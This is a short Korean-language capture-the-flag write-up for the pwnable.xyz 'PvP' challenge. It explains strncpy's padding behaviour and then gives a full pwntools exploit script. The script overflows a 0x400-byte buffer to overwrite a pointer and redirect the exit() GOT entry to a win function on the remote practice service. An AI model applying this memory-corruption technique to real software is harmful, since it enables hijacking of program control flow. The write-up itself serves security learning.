

pwnable.xyz / PvP

너무 멍청했다. 말하기도 쪽팔린다.
strncpy가 널바이트가 나올 때까지만 복사한다고 생각했다. 실제로 strncpy(dst, src, n)은 src에서 널바이트를 만나면 나머지를 널로 채워서 항상 정확히 n바이트를 dst에 쓰고, src가 n바이트 이상이면 널 종료 문자를 붙이지 않는다. 그래서 n이 dst 크기보다 크면 src 길이와 상관없이 dst 뒤의 메모리까지 덮어쓴다.


strncpy로 (페이로드에서 0x400바이트 뒤에 위치한) 포인터를 덮을 수 있고, 이를 이용해 exit의 GOT 엔트리를 win 함수 주소로 덮어써서 시그널이 터져 exit가 호출될 때 플래그가 출력되도록 했다.

from pwn import * 
#context.log_level = "debug"

# GOT slot of exit() in the target binary.  Hard-coded, so it is only valid for
# this exact build; the fixed 0x60xxxx address suggests a non-PIE binary —
# TODO confirm against the ELF before reusing.
exit_got: int = 0x6020a0


def save():
    """Pick menu option 4 ("save") on the global tube ``p`` and answer its
    follow-up "message?" prompt with 3.

    Each prompt is consumed with ``recvuntil`` before the reply is sent so the
    script stays in lock-step with the service.
    """
    # (prompt to wait for, reply to send), in the order the service asks.
    dialogue = ((b"> ", b"4"), (b"message? ", b"3"))
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)

def append(arr, func_type):
    """Send one append request through the global tube ``p`` and return how
    many bytes of ``arr`` were delivered before the NUL terminator.

    ``func_type`` is the menu number to select (1 or 2 in this script).  The
    service answers with text of the form "... me N " and N is parsed from
    it.  Up to N-1 bytes of ``arr`` are sent followed by a single NUL, so the
    caller can slice the returned count off ``arr`` and continue.

    Returns 0 (and sends nothing, or just a NUL) when N is 0 or 1.

    NOTE(review): when N exceeds len(arr) the count becomes N - len(arr)
    rather than len(arr); if that difference is 0 or 1 the slice turns into
    ``arr[:-1]`` / ``arr[:0]`` and the function returns -1 / 0.  Preserved
    as-is because the intended semantics cannot be determined from this
    script alone.
    """
    p.recvuntil(b"> ")
    # A str is sent here; pwntools appears to encode it, unlike the bytes used
    # everywhere else in the script.
    p.sendline(str(func_type))

    # The trailing space delimits the number in "... me N ".
    p.recvuntil(b"me ")
    to_take = int(p.recvuntil(b" "))

    if to_take == 0:
        return 0
    if to_take > len(arr):
        # Original behaviour: use the excess over the buffer, not len(arr).
        to_take -= len(arr)
    elif to_take == 1:
        p.send(b"\x00")
        return 0

    body = arr[: to_take - 1]
    p.send(body + b"\x00")
    return to_take - 1


# Payload layout as used by this script: three bytes that, read little-endian,
# are the low bytes of 0x400b2d (presumably the win function the write-up
# mentions — confirm against the binary), "A" filler up to 0x400 bytes, then
# the exit() GOT address, which presumably lands on the pointer stored right
# after the 0x400-byte buffer.
payload = b"\x2d\x0b\x40"
payload += b"A" * (0x400 - 3)
payload += p64(exit_got)

# The service seems to decide how many bytes it will accept per request.
# Reconnect until the first ("long", menu 2) append takes at least 0x100
# bytes; the payload is only consumed once such a connection is found.
while True:
    p = remote("svc.pwnable.xyz", 30022)
    #p = process("./pvp")
    num = append(payload, 2)
    print("long num: " + hex(num))
    if num >= 0x100:
        break
    p.close()

# Deliver the rest with "short" (menu 1) appends until all 0x408 bytes of the
# payload have been sent.
total_len = num
payload = payload[num:]
while True:
    num = append(payload, 1)
    payload = payload[num:]
    total_len += num
    print(total_len)
    if total_len >= 0x408:
        break

save()
p.interactive()
